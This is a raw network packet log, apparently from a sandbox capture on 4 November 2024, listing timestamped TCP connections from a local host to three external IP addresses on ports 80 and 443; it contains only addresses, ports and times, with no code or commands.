                                                                            Nov 4, 2024 07:13:37.972237110 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:37.972255945 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:37.972276926 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:37.975518942 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.975557089 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.975565910 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:37.975593090 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:38.032828093 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.032849073 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.032882929 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:38.032895088 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:38.089811087 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.089828014 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.089838982 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.089850903 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.089863062 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.089898109 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:38.089929104 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:38.090086937 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.090107918 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.090143919 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:38.090276003 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.090287924 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.090297937 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.090312958 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:38.090339899 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:38.090507984 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.090517044 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.090550900 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:38.090725899 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.090742111 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.090751886 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.090761900 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.090766907 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:38.090774059 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.090790033 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:38.090817928 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:38.135394096 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.135431051 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.135488033 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:38.208703995 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.208725929 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.208736897 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.208753109 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.208766937 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.208779097 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.208784103 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:38.208791971 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.208801985 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.208831072 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:38.208848953 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:38.209142923 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.209152937 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.209163904 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.209173918 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.209184885 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.209196091 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:38.209223986 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:38.209661007 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.209671974 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.209681988 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.209707022 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:38.209717035 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:38.253768921 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.253822088 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.253834963 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.253881931 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.253881931 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:38.253892899 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.253923893 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:38.253935099 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:38.327203989 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.327255964 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.327306032 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:38.327320099 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.327332973 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.327342987 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.327353954 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.327368975 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:38.327383041 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:38.327754974 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.327765942 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.327778101 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.327790022 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.327795029 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:38.327820063 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:38.328208923 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.328219891 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.328231096 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.328242064 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.328253031 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.328253984 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:38.328265905 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:38.328294992 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:38.328731060 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.328739882 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.328773022 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:38.372359991 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.372371912 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.372412920 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:38.372442961 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.372457981 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.372471094 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.372482061 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.372498989 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:38.372519970 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:38.445864916 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.445887089 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.445897102 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.445930004 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:38.445959091 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:38.446012020 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.446028948 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.446042061 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.446050882 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:38.446079969 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:38.446327925 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.446337938 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.446350098 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.446361065 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.446373940 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:38.446393967 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:38.446713924 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.446753025 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:38.446755886 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.446882963 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.446897984 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.446909904 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.446919918 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.446921110 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:38.446932077 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.446939945 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:38.446957111 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:38.446980953 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:38.491075993 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.491091967 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.491102934 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.491154909 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:38.491178989 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:38.491182089 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.491194010 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.491204023 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.491229057 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:38.491250038 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:38.564429045 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.564455986 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.564481974 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.564485073 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:38.564507008 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:38.564529896 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:38.564560890 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.564573050 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.564583063 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.564601898 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:38.564623117 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:38.564915895 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.564927101 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.564939976 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.564950943 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.564960957 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:38.564987898 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:38.565355062 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.565366983 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.565376997 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.565388918 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.565398932 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.565409899 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:38.565412045 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.565429926 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:38.565454006 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:38.609694004 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.609714985 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.609724998 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.609771013 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:38.609807014 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:38.609854937 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.609865904 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.609878063 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.609889030 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.609904051 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:38.609919071 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:38.683062077 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.683079958 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.683134079 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:38.683137894 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.683150053 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.683161020 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.683171034 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.683171034 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:38.683198929 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:38.683221102 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:38.683532953 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.683566093 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.683576107 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:38.683577061 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.683598995 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:38.683608055 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:38.683856010 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.683867931 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.683876991 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.683901072 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:38.683902979 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.683913946 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.683926105 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:38.683948040 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:38.684412003 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.684422016 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.684431076 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.684457064 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:38.684479952 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:38.728226900 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.728238106 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.728247881 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.728291035 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:38.728317976 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:38.728341103 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.728404999 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.728415966 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.728446960 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:38.728672981 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.728683949 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.728693962 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.728718996 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:38.728729010 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:38.801723957 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.801737070 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.801753998 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.801772118 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:38.801791906 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:38.801796913 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.801808119 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.801832914 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:38.801868916 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:39.175734043 CET4980480192.168.2.5193.122.6.168
                                                                            Nov 4, 2024 07:13:39.182224989 CET8049804193.122.6.168192.168.2.5
                                                                            Nov 4, 2024 07:13:39.182293892 CET4980480192.168.2.5193.122.6.168
                                                                            Nov 4, 2024 07:13:39.182477951 CET4980480192.168.2.5193.122.6.168
                                                                            Nov 4, 2024 07:13:39.188903093 CET8049804193.122.6.168192.168.2.5
                                                                            Nov 4, 2024 07:13:40.020806074 CET8049804193.122.6.168192.168.2.5
                                                                            Nov 4, 2024 07:13:40.023854971 CET4980480192.168.2.5193.122.6.168
                                                                            Nov 4, 2024 07:13:40.031563997 CET8049804193.122.6.168192.168.2.5
                                                                            Nov 4, 2024 07:13:40.269002914 CET8049804193.122.6.168192.168.2.5
                                                                            Nov 4, 2024 07:13:40.417427063 CET4980480192.168.2.5193.122.6.168
                                                                            Nov 4, 2024 07:13:40.500725031 CET8049804193.122.6.168192.168.2.5
                                                                            Nov 4, 2024 07:13:40.500829935 CET4980480192.168.2.5193.122.6.168
                                                                            Nov 4, 2024 07:13:40.596412897 CET49811443192.168.2.5188.114.96.3
                                                                            Nov 4, 2024 07:13:40.596461058 CET44349811188.114.96.3192.168.2.5
                                                                            Nov 4, 2024 07:13:40.596519947 CET49811443192.168.2.5188.114.96.3
                                                                            Nov 4, 2024 07:13:40.609847069 CET49811443192.168.2.5188.114.96.3
                                                                            Nov 4, 2024 07:13:40.609877110 CET44349811188.114.96.3192.168.2.5
                                                                            Nov 4, 2024 07:13:41.228936911 CET44349811188.114.96.3192.168.2.5
                                                                            Nov 4, 2024 07:13:41.229016066 CET49811443192.168.2.5188.114.96.3
                                                                            Nov 4, 2024 07:13:41.234251022 CET49811443192.168.2.5188.114.96.3
                                                                            Nov 4, 2024 07:13:41.234261990 CET44349811188.114.96.3192.168.2.5
                                                                            Nov 4, 2024 07:13:41.234599113 CET44349811188.114.96.3192.168.2.5
                                                                            Nov 4, 2024 07:13:41.270083904 CET49811443192.168.2.5188.114.96.3
                                                                            Nov 4, 2024 07:13:41.311336040 CET44349811188.114.96.3192.168.2.5
                                                                            Nov 4, 2024 07:13:41.522629976 CET44349811188.114.96.3192.168.2.5
                                                                            Nov 4, 2024 07:13:41.522712946 CET44349811188.114.96.3192.168.2.5
                                                                            Nov 4, 2024 07:13:41.522943974 CET49811443192.168.2.5188.114.96.3
                                                                            Nov 4, 2024 07:13:41.527718067 CET49811443192.168.2.5188.114.96.3
                                                                            Nov 4, 2024 07:13:41.532917023 CET4980480192.168.2.5193.122.6.168
                                                                            Nov 4, 2024 07:13:41.537842035 CET8049804193.122.6.168192.168.2.5
                                                                            Nov 4, 2024 07:13:41.780272961 CET8049804193.122.6.168192.168.2.5
                                                                            Nov 4, 2024 07:13:41.782399893 CET49819443192.168.2.5188.114.96.3
                                                                            Nov 4, 2024 07:13:41.782440901 CET44349819188.114.96.3192.168.2.5
                                                                            Nov 4, 2024 07:13:41.782505989 CET49819443192.168.2.5188.114.96.3
                                                                            Nov 4, 2024 07:13:41.782759905 CET49819443192.168.2.5188.114.96.3
                                                                            Nov 4, 2024 07:13:41.782773972 CET44349819188.114.96.3192.168.2.5
                                                                            Nov 4, 2024 07:13:41.823378086 CET4980480192.168.2.5193.122.6.168
                                                                            Nov 4, 2024 07:13:42.386775017 CET44349819188.114.96.3192.168.2.5
                                                                            Nov 4, 2024 07:13:42.388278961 CET49819443192.168.2.5188.114.96.3
                                                                            Nov 4, 2024 07:13:42.388294935 CET44349819188.114.96.3192.168.2.5
                                                                            Nov 4, 2024 07:13:42.525620937 CET44349819188.114.96.3192.168.2.5
                                                                            Nov 4, 2024 07:13:42.525703907 CET44349819188.114.96.3192.168.2.5
                                                                            Nov 4, 2024 07:13:42.525748968 CET49819443192.168.2.5188.114.96.3
                                                                            Nov 4, 2024 07:13:42.526109934 CET49819443192.168.2.5188.114.96.3
                                                                            Nov 4, 2024 07:13:42.529591084 CET4980480192.168.2.5193.122.6.168
                                                                            Nov 4, 2024 07:13:42.530684948 CET4982580192.168.2.5193.122.6.168
                                                                            Nov 4, 2024 07:13:42.534692049 CET8049804193.122.6.168192.168.2.5
                                                                            Nov 4, 2024 07:13:42.534745932 CET4980480192.168.2.5193.122.6.168
                                                                            Nov 4, 2024 07:13:42.535444021 CET8049825193.122.6.168192.168.2.5
                                                                            Nov 4, 2024 07:13:42.535492897 CET4982580192.168.2.5193.122.6.168
                                                                            Nov 4, 2024 07:13:42.535563946 CET4982580192.168.2.5193.122.6.168
                                                                            Nov 4, 2024 07:13:42.536268950 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:42.536313057 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:42.540365934 CET8049825193.122.6.168192.168.2.5
                                                                            Nov 4, 2024 07:13:43.368520975 CET8049825193.122.6.168192.168.2.5
                                                                            Nov 4, 2024 07:13:43.369544029 CET49829443192.168.2.5188.114.96.3
                                                                            Nov 4, 2024 07:13:43.369569063 CET44349829188.114.96.3192.168.2.5
                                                                            Nov 4, 2024 07:13:43.369630098 CET49829443192.168.2.5188.114.96.3
                                                                            Nov 4, 2024 07:13:43.369842052 CET49829443192.168.2.5188.114.96.3
                                                                            Nov 4, 2024 07:13:43.369857073 CET44349829188.114.96.3192.168.2.5
                                                                            Nov 4, 2024 07:13:43.417133093 CET4982580192.168.2.5193.122.6.168
                                                                            Nov 4, 2024 07:13:43.986378908 CET44349829188.114.96.3192.168.2.5
                                                                            Nov 4, 2024 07:13:43.987953901 CET49829443192.168.2.5188.114.96.3
                                                                            Nov 4, 2024 07:13:43.987993002 CET44349829188.114.96.3192.168.2.5
                                                                            Nov 4, 2024 07:13:44.137142897 CET44349829188.114.96.3192.168.2.5
                                                                            Nov 4, 2024 07:13:44.137242079 CET44349829188.114.96.3192.168.2.5
                                                                            Nov 4, 2024 07:13:44.137330055 CET49829443192.168.2.5188.114.96.3
                                                                            Nov 4, 2024 07:13:44.137768984 CET49829443192.168.2.5188.114.96.3
                                                                            Nov 4, 2024 07:13:44.141850948 CET4983480192.168.2.5193.122.6.168
                                                                            Nov 4, 2024 07:13:44.146673918 CET8049834193.122.6.168192.168.2.5
                                                                            Nov 4, 2024 07:13:44.146784067 CET4983480192.168.2.5193.122.6.168
                                                                            Nov 4, 2024 07:13:44.146894932 CET4983480192.168.2.5193.122.6.168
                                                                            Nov 4, 2024 07:13:44.151639938 CET8049834193.122.6.168192.168.2.5
                                                                            Nov 4, 2024 07:13:44.988532066 CET8049834193.122.6.168192.168.2.5
                                                                            Nov 4, 2024 07:13:44.990812063 CET49840443192.168.2.5188.114.96.3
                                                                            Nov 4, 2024 07:13:44.990854979 CET44349840188.114.96.3192.168.2.5
                                                                            Nov 4, 2024 07:13:44.990921974 CET49840443192.168.2.5188.114.96.3
                                                                            Nov 4, 2024 07:13:44.991153002 CET49840443192.168.2.5188.114.96.3
                                                                            Nov 4, 2024 07:13:44.991163015 CET44349840188.114.96.3192.168.2.5
                                                                            Nov 4, 2024 07:13:45.042145967 CET4983480192.168.2.5193.122.6.168
                                                                            Nov 4, 2024 07:13:45.814275980 CET44349840188.114.96.3192.168.2.5
                                                                            Nov 4, 2024 07:13:45.815844059 CET49840443192.168.2.5188.114.96.3
                                                                            Nov 4, 2024 07:13:45.815865040 CET44349840188.114.96.3192.168.2.5
                                                                            Nov 4, 2024 07:13:45.954035044 CET44349840188.114.96.3192.168.2.5
                                                                            Nov 4, 2024 07:13:45.954139948 CET44349840188.114.96.3192.168.2.5
                                                                            Nov 4, 2024 07:13:45.954226971 CET49840443192.168.2.5188.114.96.3
                                                                            Nov 4, 2024 07:13:45.954560995 CET49840443192.168.2.5188.114.96.3
                                                                            Nov 4, 2024 07:13:45.957654953 CET4983480192.168.2.5193.122.6.168
                                                                            Nov 4, 2024 07:13:45.958647966 CET4984680192.168.2.5193.122.6.168
                                                                            Nov 4, 2024 07:13:45.962914944 CET8049834193.122.6.168192.168.2.5
                                                                            Nov 4, 2024 07:13:45.962982893 CET4983480192.168.2.5193.122.6.168
                                                                            Nov 4, 2024 07:13:45.963507891 CET8049846193.122.6.168192.168.2.5
                                                                            Nov 4, 2024 07:13:45.963571072 CET4984680192.168.2.5193.122.6.168
                                                                            Nov 4, 2024 07:13:45.963639021 CET4984680192.168.2.5193.122.6.168
                                                                            Nov 4, 2024 07:13:45.968791008 CET8049846193.122.6.168192.168.2.5
                                                                            Nov 4, 2024 07:13:46.798877001 CET8049846193.122.6.168192.168.2.5
                                                                            Nov 4, 2024 07:13:46.800069094 CET49852443192.168.2.5188.114.96.3
                                                                            Nov 4, 2024 07:13:46.800110102 CET44349852188.114.96.3192.168.2.5
                                                                            Nov 4, 2024 07:13:46.800168991 CET49852443192.168.2.5188.114.96.3
                                                                            Nov 4, 2024 07:13:46.800502062 CET49852443192.168.2.5188.114.96.3
